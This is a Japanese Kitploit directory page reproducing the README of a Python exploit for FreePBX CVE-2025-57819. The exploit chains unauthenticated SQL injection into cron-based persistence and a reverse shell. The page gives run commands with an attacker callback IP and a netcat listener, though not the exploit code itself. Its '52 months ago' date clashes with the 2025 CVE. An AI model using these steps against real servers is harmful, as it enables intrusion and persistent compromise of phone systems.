Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2025-57819-exploit — CVE-2025-57819 を標的とする Python エクスプロイト。FreePBX に対する認証不要の SQL インジェクションを介してリモートコード実行を実現し、自動リバースシェルと cron ベースの永続化を備えています。 | Kitploit
ツール/GitHubGitHub/its1zero/cve-2025-57819-exploit
永続化メカニズム脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubits1zero/cve-2025-57819-exploit

cve-2025-57819-exploit

CVE-2025-57819 を標的とする Python エクスプロイト。FreePBX に対する認証不要の SQL インジェクションを介してリモートコード実行を実現し、自動リバースシェルと cron ベースの永続化を備えています。

リポジトリを見る
52ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-57819 エクスプロイト

メタデータ

  • 重要度: 重大 (9.8)
  • ベクトル: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • タイプ: 認証なしSQLインジェクション → リモートコード実行
  • 影響を受けるソフトウェア: FreePBX (endpoint module) < 15.0.66, < 16.0.89 and < 17.0.3
  • テスト環境: FreePBX 16.0.40.7 on CentOS 7 with Apache 2.4

概要

このスクリプトは、脆弱性のあるFreePBXエンドポイントモジュールのCVE-2025-57819を悪用します。この脆弱性はSQLインジェクションを許容し、それを利用して悪意のあるcronジョブを注入します。

他の公開エクスプロイトのように、アップロードしたウェブシェルを介してターゲットと対話するための追加手順は不要です。これは直接的なアプローチであり、直接リバースシェルアクセスを提供します。

影響

リモートコード実行はSQLインジェクションとcronジョブ操作によって達成されます。悪用に成功すると、ターゲットシステム上でリバースシェルが得られます。設定によっては、システム全体の侵害につながる可能性があります。

機能

  • 脆弱なAJAXエンドポイントを介したSQLインジェクション
  • 自動リバースシェルペイロード生成
  • 毎分のスケジュール実行によるcronジョブ永続化 (* * * * *)
  • 注入したcronジョブの自動クリーンアップ
  • 16進エンコードされたペイロードを使用します。base64ペイロードは+文字がスペースとして解釈されるため破損します。

使用方法

ターゲットとリスナーの設定を指定してエクスプロイトを実行します:

root@kitploit:~
python3 cve-2025-57819.py <target> <lhost> <lport>

パラメータ

  • <target>: ターゲットのホスト名またはIPアドレス(脆弱なFreePBXインスタンス)
  • <lhost>: リバースシェルコールバック用の攻撃者IPアドレス
  • <lport>: 受信接続用のリスニングポート

例:

root@kitploit:~
python3 cve-2025-57819.py freepbx.local 10.10.16.38 9999

リスナーのセットアップ

エクスプロイトを実行する前にリスナーを起動してください:

root@kitploit:~
nc -lvnp <port>

例:

root@kitploit:~
nc -nlvp 9999

免責事項

このツールは教育目的および許可されたセキュリティテストのみを対象としています。明示的な許可なくシステムに対して不正に使用することは違法です。作者は、このツールの誤用または損害について一切の責任を負いません。

作者

Its1Zero - [email protected]

参考文献

  • https://nvd.nist.gov/vuln/detail/cve-2025-57819
  • https://github.com/freepbx/security-reporting/security/advisories/ghsa-m42g-xg4c-5f3h
  • https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819
ツールをダウンロード